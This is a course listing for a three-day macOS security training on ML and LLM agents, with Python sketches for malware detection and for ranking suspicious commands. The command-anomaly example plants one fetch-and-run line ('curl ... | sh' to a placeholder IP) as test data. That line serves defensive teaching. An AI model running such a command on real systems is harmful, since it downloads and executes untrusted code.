AI for Mac Security

A hands-on course on using machine learning, LLMs, and agents for macOS security.

Training overview

This training shows you how to use machine learning (ML) and AI for macOS malware triage, process analysis, and investigation. While this training will not turn you into a full ML engineer, it will give you an understanding of how ML and AI work and how you can use them to solve Mac security challenges.

Over three days, we'll cover supervised machine learning, unsupervised machine learning, and generative AI. We start with data collection, labels, features, model testing, and model failure. From there, we build a Mac malware detector and a suspicious command detector. We then use LLMs, retrieval, tool calling, MCP, and agent tools to summarize command activity, enrich alerts, and draft investigation notes. Finally, we'll use long-running agents to threat hunt against macOS.

The course is designed for students who know basic macOS security concepts but are new to ML, as well as students who have seen some ML and want practical methods for malware detection, command analysis, and LLM-assisted triage. More than half of our time will be spent on hands-on lab work, which requires some proficiency with Python.

When

November 15-17, 2026

Where

Hyatt Regency Maui
(the #OBTS conference venue).


Details

Day 1: Build a Mac malware detector

Goal: Use Mach-O file samples to train and test a Mac malware detector.

Learning objectives
- Understand how to build a supervised detector for a security problem.
- Pull fields from Mach-O files and related metadata.
- Train a random forest classifier and explain its results in defender terms.
- Use model mistakes to improve data quality, features, and evaluation.
Topic overview
- What supervised ML can and cannot solve in malware detection.
- Why the question, label, and evaluation method matter more than the algorithm.
- Mach-O structure, load commands, segments, sections, imports, and architecture.
- Code signing, entitlements, notarization signals, developer identifiers, and file paths.
- Persistence locations and other high-signal macOS context.
- Building a dataset from malware samples and repeatable collection steps.
- Handling duplicates, missing values, architecture splits, and noisy labels.
- Train, validation, and test splits that keep leakage from polluting results.
- Turning Mach-O metadata and file context into columns a model can use.
- Keeping features clear enough that a defender can explain them.
- Random forests as a baseline model.
- Hyperparameters, class imbalance, and feature importance.
- Precision, recall, F1, confusion matrices, thresholds, and alert volume.
- Reviewing false positives and false negatives as a security exercise.
- Optional topics:
- N-gram features from disassembly or opcode sequences.
- A short neural network demo to introduce deep learning ideas that appear again in embeddings and LLMs.
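The Day 1 pipeline can be sketched end to end in a few lines of scikit-learn. The feature names (load command count, import count, signing and entitlement flags) and the synthetic data below are illustrative placeholders, not the course dataset:

```python
# Sketch of the Day 1 flow: tabular Mach-O-style features -> random forest.
# All features and value ranges here are made up for illustration.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(42)
n = 200

# Hypothetical columns: [num_load_commands, num_imports, is_signed, has_entitlements]
benign = np.column_stack([
    rng.integers(10, 30, n),   # benign binaries: more load commands
    rng.integers(50, 200, n),  # and richer import tables
    np.ones(n),                # always signed
    rng.integers(0, 2, n),
])
malicious = np.column_stack([
    rng.integers(5, 15, n),
    rng.integers(5, 60, n),
    rng.integers(0, 2, n),     # sometimes unsigned
    np.zeros(n),
])
X = np.vstack([benign, malicious])
y = np.array([0] * n + [1] * n)  # 0 = benign, 1 = malicious

# Stratified split so both classes appear in train and test
X_tr, X_te, y_tr, y_te = train_test_split(
    X, y, test_size=0.25, stratify=y, random_state=0
)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
pred = clf.predict(X_te)

print(f"precision={precision_score(y_te, pred):.2f} "
      f"recall={recall_score(y_te, pred):.2f}")

# Feature importance, reported in defender terms
for name, imp in zip(["load_cmds", "imports", "signed", "entitlements"],
                     clf.feature_importances_):
    print(f"{name}: {imp:.2f}")
```

On real samples the work is in the earlier bullets, i.e. collecting, deduplicating, and labeling the data so a split like this is trustworthy; the model call itself is the easy part.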

Day 2: Find suspicious commands without labels

Goal: Find suspicious command behavior when you do not already know which commands are bad, then use LLMs to review the results with evidence.

Learning objectives
- Turn command executions and process context into model input.
- Use TF-IDF, embeddings, distance, and anomaly scores to rank commands for review.
- Explain why unsupervised methods help with discovery but still need human review.
- Use LLMs to summarize and classify command behavior without hiding the underlying evidence.
- Build a script that sends command data to the LLM and returns a structured result.
Topic overview
- Process lineage, executable path, command line, user, parent process, working directory, and timestamp.
- What defenders can observe from Endpoint Security, EDR, Unified Logs, and SIEM pipelines.
- Normalization problems in real command data.
- Command lines, paths, flags, URLs, bundle identifiers, and developer IDs.
- Tokenization choices for shell commands and process arguments.
- TF-IDF as a clear baseline for turning commands into model input.
- Isolation forest for unusual commands and process activity.
- Thresholds, contamination settings, and analyst review loops.
- Why outliers are not automatically malicious.
- Semantic similarity for finding commands that look related.
- Comparing TF-IDF distance and embedding distance.
- Grouping related commands for review.
- Sending clear text that describes command executions and context.
- Getting a consistent triage result with risk, reasons, evidence, and follow-up questions.
- Keeping prompts grounded in observed fields rather than unsupported guesses.
- Retrieving local runbooks, ATT&CK notes, analyst notes, or known-good examples.
- Using retrieved notes to improve command triage while preserving source attribution.
- Failure modes: stale context, prompt injection, overbroad retrieval, and unreviewed summaries.
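The unsupervised half of Day 2 can be sketched as TF-IDF over command lines feeding an isolation forest. The commands below are a toy corpus with one planted outlier; on a corpus this small the ranking is not guaranteed, which is exactly the "outliers still need human review" point:

```python
# Sketch of the Day 2 flow: command lines -> TF-IDF -> isolation forest scores.
# Toy corpus for illustration; real pipelines use normalized EDR/ES telemetry.
from sklearn.ensemble import IsolationForest
from sklearn.feature_extraction.text import TfidfVectorizer

commands = [
    "ls -la /Users/alice/Documents",
    "ls -la /Users/alice/Desktop",
    "ls -la /Users/bob/Documents",
    "cat /etc/hosts",
    "cat /etc/passwd",
    "open -a Safari",
    "open -a Notes",
    "git status",
    "git pull",
    "curl -s http://203.0.113.9/x.sh | sh",  # planted outlier (TEST-NET address)
]

# Split on whitespace so flags, paths, and URLs survive as tokens
vec = TfidfVectorizer(token_pattern=r"[^\s]+")
X = vec.fit_transform(commands)

iso = IsolationForest(contamination=0.1, random_state=0).fit(X.toarray())
scores = iso.decision_function(X.toarray())  # lower = more anomalous

# Rank for analyst review, most anomalous first
for cmd, s in sorted(zip(commands, scores), key=lambda pair: pair[1]):
    print(f"{s:+.3f}  {cmd}")
```

The `contamination` setting is the knob from the bullets above: it trades alert volume against missed outliers, and a human still decides whether the top-ranked commands are actually malicious.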

Day 3: Use agents for security work

Goal: Build agents for security analysis, then learn how agent apps can inspect files, run commands, and retry after errors.

Learning objectives
- Distinguish simple LLM calls, tool-using agents, MCP-connected tools, and long-running agent apps.
- Build agents that use tools for enrichment and investigation while preserving evidence.
- Test agents with realistic examples before trusting them in a security task.
- Use MCP to connect agents to external tools such as enrichment, retrieval, or SIEM queries.
- Use project instructions, skills, and repo context to guide agent tools in security work.
Topic overview
- When an agent with tools is justified and when a single structured LLM call is better.
- Tool definitions, typed inputs, typed outputs, and error handling.
- Structured findings tied to source evidence.
- Tool boundaries, approvals, audit logs, and traceability.
- Prompt injection risks when agents read untrusted content.
- Rules that stop agents from leaking data, making unauthorized changes, calling outside services, or overspending.
- Building a small test set of alerts, command executions, and expected agent outputs.
- Checking whether the agent used the right tools, preserved evidence, and avoided unsupported claims.
- Running simple regression checks after changing prompts, tools, models, or retrieved context.
- MCP hosts, clients, servers, tools, and resources.
- Connecting an agent to enrichment, retrieval, or SIEM queries.
- Comparing built-in Python tools with MCP-provided tools.
- Agent handoffs, manager-style delegation, and specialized agents.
- Keeping the agent run simple enough to debug.
- Designing agent runs that produce evidence, not just summaries.
- Codex, Claude Code, and similar systems as tools that can inspect a repo, edit files, run commands, and retry after errors.
- Terminal access, repository inspection, file edits, test execution, and iterative repair.
- Project instructions such as AGENTS.md.
- Reusable skills, local context, and documented steps.
- How agent apps differ from building an agent directly with an SDK.
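The typed-tool pattern from the bullets above (typed inputs, typed outputs, error handling, findings tied to evidence) can be sketched without any framework. The tool name, its lookup table, and the result shape here are all hypothetical:

```python
# Sketch of a typed agent tool with input validation and evidence-carrying
# output. Names and the lookup table are illustrative, not a real service.
import json
from dataclasses import dataclass, field


@dataclass
class ToolResult:
    ok: bool
    output: str
    evidence: list = field(default_factory=list)  # sources the answer is tied to


def lookup_process(args: dict) -> ToolResult:
    """Tool: return local context for a process name."""
    table = {
        "osascript": "Apple scripting runtime; common in macOS malware lures.",
        "launchctl": "Manages launchd jobs; watch for persistence changes.",
    }
    name = args.get("name")
    if not isinstance(name, str):
        # Typed-input check: fail loudly instead of guessing
        return ToolResult(False, "invalid input: 'name' must be a string")
    info = table.get(name)
    if info is None:
        return ToolResult(False, f"unknown process: {name}")
    return ToolResult(True, info,
                      evidence=[{"source": "local_table", "key": name}])


# An agent loop would parse the model's tool call (JSON) and dispatch it:
call = json.loads('{"tool": "lookup_process", "arguments": {"name": "launchctl"}}')
result = lookup_process(call["arguments"])
print(result.ok, result.output, result.evidence)
```

Keeping every `ToolResult` attached to its evidence is what makes the later audit-log and "no unsupported claims" checks possible; MCP standardizes how such tools are described and called across hosts.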

Cost

$2,000

Cost does not include a conference ticket. Please also register here!

Cancellation:
Cancellations up to a month before the training (by Oct. 15, 2026) will be refunded in full (minus any payment processing fees).
Cancellations less than a month before will be refunded at half rate (minus any payment processing fees).

Required setup

MacBook (Apple Silicon preferred)
Prior to the training start, you will receive an email with additional details on access to the private GitHub repository.


About the trainer

Dr. Kimo Bumanglag is a Member of Technical Staff at OpenAI focused on threat hunting and intelligence. He also serves as an adjunct lecturer at Johns Hopkins University, where he's committed to making complex cybersecurity topics accessible and mentoring the next generation of security professionals. In addition, he spent years training people for the NSA, US Marine Corps, and US Air Force in offensive and defensive cyber operations.


© All rights reserved.